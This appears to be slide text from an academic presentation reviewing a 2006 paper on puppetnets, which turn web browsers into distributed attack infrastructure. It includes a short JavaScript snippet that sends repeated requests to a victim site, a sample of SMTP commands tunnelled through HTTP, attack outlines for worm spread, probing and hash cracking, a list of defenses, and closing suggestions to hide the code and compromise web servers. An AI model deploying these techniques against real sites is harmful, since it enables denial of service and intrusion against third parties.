Puppetnets: Misusing Web Browsers as a Distributed

Attack Infrastructure

Paper By : V.T.Lam, S.Antonatos, P.Akritidis, K.G.Anagnostakis

Conference : ACM Conference on Computer and Communications Security 2006

Presented By : Ramanarayanan Ramani

Scenario

Attacker

1.Compromise

2.Embed Malicious Code in Webpage

3.Clients Access Webpage and execute malicious code

Clients are the Puppets – they can be controlled till they have the webpage open in the browser.

Puppetnet vs Botnet Not heavily dependent on the exploitation

of specific implementation flaws

The attacker does not have complete control over the actions of the participating nodes

Participation in puppetnets is more dynamic

OverviewAttack Scenarios using

PuppetnetAnalysis of attack scenariosDefense against PuppetnetsPaper ReviewSuggestions

DDoS (Distributed Denial of Service)

DDoS Sample Code :

<script language=‘javascript’>setTimeout(pingVictim,1000);Function pingVictim(){

var image1 = getElementById(‘img1’);image1.src = “www.victim.com/badurl.jpg”;setTimeout(pingVictim,1000);

}</script><body> <img id=‘img1’ /> </body>

Worm Propagation

Worm Propagation Embed Worm Code in the Webpage Perform scanning and try to propagate the

worm code

If outbound from server blocked – it can propagate using webpage

Client behind NAT/Firewall can propagate in the secure network

Reconnaissance probes

Reconnaissance probes Problem : Browsers refuse access to the

contents of an inline frame, unless the source of the frame is in the same domain with the parent page

“Sandwich” the probe request between two requests to the malicious Web site

Use onLoad,onError event handlers to sandwich request

Protocols other than HTTP Limitation of Puppetnets : Bound to use HTTP as

part of browser

Solution : Tunnel SMTP/IRC/FTP.. Protocol messages wrapped around the HTTP

message

GET /index.html HTTP/1.1 Host: www.example.com:25HELO mydomain.com … (For SMTP)

Exploiting cookie authenticatedservices

Constraints : The inline frame needs to be able to post

cookies; this works on Firefox, but not IE Have knowledge about the structure and

content of the form to be posted, as well as the target URL

Able to instruct browsers to automatically post such forms (Supported by all browsers)

Distributed malicious computations Can be done through Javascript, Active-X or Java applets ActiveX : Produces ‘Accept’ or ‘Deny’ box Applets : Instantiate JVM – but can be placed in

hidden frames Script : Slower but can be hidden

Example : MD5 computation Javascript : 380 checksums/sec Applet : 434K checksums/sec

1,000-node puppetnet can crack an MD5 hash as fast as a 128-node cluster

Analysis - DDoS

Analysis - DDoS

Analysis - DDoS

Two types of attacks: • A simple attack aiming to maximize SYN packets (maxSYN)• One aiming to maximize the ingress bandwidth consumed (maxURL)

Analysis - DDoS

* Estimate for a 1000-node puppetnet

Analysis – Worm PropagationCodeRed Worm

CodeRed attacks IIS server (Web Server)• A vulnerable population of 360,000 and a server scanning rate of 358 scans/min• Browsers performing 36 scans/min

Analysis – Worm PropagationCodeRed Worm

Analysis – Worm PropagationCodeRed Worm

Analysis - Reconnaissance probes

Analysis - Reconnaissance probes

Defense Disabling Javascript Careful implementation of existing

defenses Filtering using attack signatures Client-side behavioral controls Server-side controls and puppetnet tracing Server-directed client-side controls

Advantages Simple and very effective to attack Light-weight compared to botnet Uses HTTP which makes detection difficult

Disadvantages No complete control over client Tough to compromise web servers (not

explained how to do it in the paper) View Source Command on HTML page will

reveal puppetnet code

Suggestions Look into hiding code using encoding or

embed code into objects like Flash Use puppetnet to create botnet in the

client machine Provide ideas to compromise the web

server

?Questions?